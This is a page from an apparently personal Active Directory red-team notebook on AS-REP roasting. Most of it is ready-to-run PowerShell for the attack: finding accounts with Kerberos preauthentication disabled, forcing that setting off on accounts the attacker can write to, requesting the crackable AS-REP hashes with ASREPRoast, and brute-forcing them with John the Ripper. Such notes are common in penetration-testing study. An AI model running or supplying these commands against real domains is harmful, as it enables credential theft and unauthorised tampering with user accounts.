πŸ–ŒοΈ
AD-RED-TEAM
  • Active Directory Red Team
  • PowerShell Basics
    • Tips And Tricks
  • I. Active Directory Enumeration
    • User Hunting Domain Enumeration
    • Forest and Domains
    • User Enumeration
    • Groups Enumeration
    • Computers/Server Enumeration
    • Shares Enumeration
    • GP And OU Enumeration
    • ACL Domain Enumeration
    • Trust Domain Enumeration
  • II. Local Privilege Escalation
    • Lateral Movement
    • PowerUp Exploits
  • III. Domain Privilege Escalation
    • Forest Persistence – DCShadow
    • Trust Abuse - MSSQL Servers
    • Priv Esc – Across Forest using krbtgt Ticket
    • Priv Esc - Across Trusts using Trust Tickets
    • Priv Esc – DNSAdmins
    • Priv Esc - Constrained Delegation
    • Priv Esc – Unconstrained Delegation
    • Priv Esc - Targeted Kerberoasting - Set SPN
    • Targeted Kerberoasting - AS-REPs
    • Priv Esc - Kerberoast
  • IV. Domain Persistence and Dominance
    • Persistence ACLs - Security Descriptors
    • Persistence ACLs- Rights Abuse
    • Persistence ACL - AdminSDHolder
    • Persistence – Custom SSP
    • Persistence - DSRM
    • Persistence - Skeleton Key
    • Persistence - Silver Ticket
    • Persistence - Golden Ticket
  • V. Cross Trust Attacks
  • VI. Forest Persistence and Dominance
  • VII. Defenses – Monitoring
  • VIII. Defenses and bypass – Architecture and Work Culture Changes
  • IX. Defenses and Bypass – Deception
  • X. Defenses and Bypass – PowerShell
  • New Server
    • Move Lat-AppLocker
    • Move Lat-Invoke-Command
Powered by GitBook
On this page

Was this helpful?

  1. III. Domain Privilege Escalation

Targeted Kerberoasting - AS-REPs

Targeted Kerberoasting - AS-REPs

  • If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled i.e. Kerberos preauth is disabled, it is possible to grab user's crackable AS-REP and brute-force it offline.

  • With sufficient rights (GenericWrite or GenericAll), Kerberos preauth can be forced disabled as well.

  • Kerberos is enabled by default and it is rare to find this.

  • Requirements:

    • If we have enough permission over users or groups, we can disable DoesnotRequirePreAuth for the users.

    • If the Kerberos is already disabled

#Enumerating accounts with Kerberos Preauth disabled
#Using PowerView_dev:
import-module powerview_dev.ps1
Get-DomainUser -PreauthNotRequired -Verbose
 
 
#Force disable Kerberos Preauth:
import-module powerview_dev.ps1 
#We look for users who are going to be able to be edit because
#I am part of the RDP user. Whatever we find we the below command
#we can enable DoesnotRequirePreAuth and get the hash to crack offline:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
#Disable the DoesnotRequirePreAuth for a user
Set-DomainObject -Identity <usernametodisablehere> -XOR @{useraccountcontrol=4194304} –Verbose
#see if the account you disabled appears
Get-DomainUser -PreauthNotRequired -Verbose


#Using ActiveDirectory module:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth


---------------------Abuse it---------------
#import-module
import-module ASREPRoast-master\ASREPRoast.ps1


#Request encrypted AS-REP for offline brute-force
Get-ASREPHash -UserName VPN1user -Verbose


#To enumerate all users with Kerberos preauth disabled and request a hash
Invoke-ASREPRoast -Verbose


Using bleeding-jumbo branch of John The Ripper, we can brute-force the hashes offline.
./john vpn1user.txt --wordlist=wordlist.txt

./john vpn1user.txt --wordlist=wordlist.txt

Get-DomainUser -PreauthNotRequired -Verbose

if any user has Does not RequirePreAuth, can be used for this attack

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

PreviousPriv Esc - Targeted Kerberoasting - Set SPNNextPriv Esc - Kerberoast

Last updated 4 years ago

Was this helpful?